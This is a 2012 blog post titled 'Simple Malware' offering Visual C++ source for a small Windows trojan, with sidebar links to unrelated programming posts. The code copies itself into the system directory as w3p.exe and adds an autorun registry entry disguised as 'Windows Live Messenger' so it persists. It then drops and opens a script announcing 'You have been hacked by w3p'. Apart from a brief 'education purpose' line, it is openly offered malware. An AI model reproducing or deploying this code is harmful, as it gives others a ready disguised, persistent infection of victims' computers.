Our Feeds
Categories
Home
About
XploitZ
Vulnerability
Hacking
Shellcode
Buffer Overflow
Programming
CSS
C
CPP
Python
PHP
Java
HTML
Android
Video Tutorials
PlayStore*
Home
C++
Malware
Programming Language
Visual c++
Simple Malware
Friday, 7 September 2012
AJITH KP
Simple Malware
AJITH KP
September 07, 2012
No comments :
A simple malware coded in Visual C++. It will detect by antivirus(Kaspersky) as HEUR:Trojen:Win32. Even though use this for education purpose.
#include
#include
void Regs(); void Vbs(); void w3p(); void Regs() { char system[MAX_PATH]; char path2file[MAX_PATH]; HMODULE GetModH=GetModuleHandle(NULL); GetModuleFileName(GetModH, path2file, sizeof(path2file)); GetSystemDirectory(system, sizeof(system)); strcat(system, "\\w3p.exe"); CopyFile(path2file,system,false); SetFileAttributes("w3p.exe", FILE_ATTRIBUTE_HIDDEN); HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &hKey); RegSetValueEx(hKey, "Windows Live Messenger", 0, REG_SZ, (const unsigned char *)system, sizeof(system)); RegCloseKey(hKey); } void Vbs() { FILE *fp; fp=fopen("w3p.vbs", "w"); fprintf(fp, "MsgBox \"Hello, You have been hacked by w3p\""); ShellExecute(NULL, "open", "w3p.vbs", NULL,NULL, SW_SHOWNORMAL); SetFileAttributes("w3p.vbs", FILE_ATTRIBUTE_HIDDEN); } void w3p() { Regs(); Vbs(); } int main() { w3p(); return 0; }
Enjoy Yourself.
Next
« Prev Post
Previous
Next Post »
Popular Posts
Easiest way to convert RGB Color Image to Gray scale Image in Java
Hello GuyZ, I would like to share Java code to convert RGB images to Gray scale images. I have seen many Java codes which converts im...
Fist GUI Program - FASM
I hope you have read the previous posts about FASM. Else please read it here: http://terminalcoders.blogspot.in/search/label...
Digital Camera Day or Night - Python Solution
"You need to construct a feature in a Digital Camera, which will auto-detect and suggest to the photographer whether the pi...
OpenGL: Line Drawing - DDA Algorithm
Hello GuYz, DDA algorithm is another popular line drawing algorithm. Source Code #include <gl/glut.h> #include <Wind...
Web Application Vulnerabilities: Dawn, Detection, Exploitation and Defence Slide Show
ABSTRACT Web applications are popular software application types in which the client runs the application stored in server in his/her we...
Beautiful Black-Green Theme for Hackers [GNOME/GTK/KALI LINUX]
If you like this theme download it from here: http://downloads.ziddu.com/download/24041123/HackerTheme.tar.gz.html ...
Histogram Equalization Algorithm and Implementation in Java
Histogram equalization is a technique used to enhance the contrast of image using the histogram of image. The histogram of image represents...
Skin Detection Algorithm - Implementation in Java
Hi GuyZ,,, This is one of the partial solution of my Mini Project. This is an implementation of skin detection algorithm in Jav...
P2P Networks
A P2P [ Peer 2 Peer ]computer network is one in which each computer in the network can act as a server or client for the other computers ...
Google Dork Generator
( keyword: ) ( site: ) ( intitle: ) ( inurl: )
..:: SUPPORT US ::..
Labels
Programming Language
Programming Languages Theory
Adv. Hacking
Hacking
Vulnerability
C++
CPP
ALOGORITHM
Java
C
Python
Linux
PHP
Shellcode
Buffer Overflow
JavaFX
x64
Android
Digital Image Processing
Graphics
Image Processing
Metasploit
OpenGL
AI
FASM